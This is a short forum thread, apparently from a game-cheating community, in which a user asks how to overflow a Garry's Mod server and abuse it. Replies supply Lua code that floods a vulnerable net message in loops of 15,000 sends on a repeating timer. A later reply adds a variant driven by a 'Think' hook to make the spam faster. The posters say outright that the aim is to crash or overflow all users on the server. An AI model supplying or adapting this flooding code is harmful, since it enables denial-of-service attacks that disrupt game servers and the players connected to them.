SolvedOverflowing server toward exploiting it

Posts 15 of 5 · Page 1 of 1
Overflowing server toward exploiting it
How can I overflow server and abuse it? Once I do overflow it what do I gain with it?
Just do
timer.Create("crashdashit", 2, 0, function()
for i=0, 15000 do
net.Start("Vulnerable net message")
net.SendToServer()
end
end)
If you find a vulnerable net message (easy) this will overflow all users
Quote Originally Posted by Alexmagno7 View Post
Just do
timer.Create("crashdashit", 2, 0, function()
for i=0, 15000 do
net.Start("Vulnerable net message")
net.SendToServer()
end
end)
If you find a vulnerable net message (easy) this will overflow all users
Net Messages have been fixed for a very long time it won't buffer overflow unless you can edit the server modules and spam net.Recievers something that is not an local table
Quote Originally Posted by suchisgood View Post
Net Messages have been fixed for a very long time it won't buffer overflow unless you can edit the server modules and spam net.Recievers something that is not an local table
What? he can crash people using that if it was a valid net message

- - - Updated - - -

Quote Originally Posted by Keepo123 View Post
What? he can crash people using that if it was a valid net message
You could do this to make it faster since the hook calls faster I learned,

Code:
function spam()
for i = 0, 1000 do
net shit here
end
end
hook.Add("Think", "", spam)
Hasn't responded in a few days and has been online recently assuming solved.

/Closed.
Posts 15 of 5 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?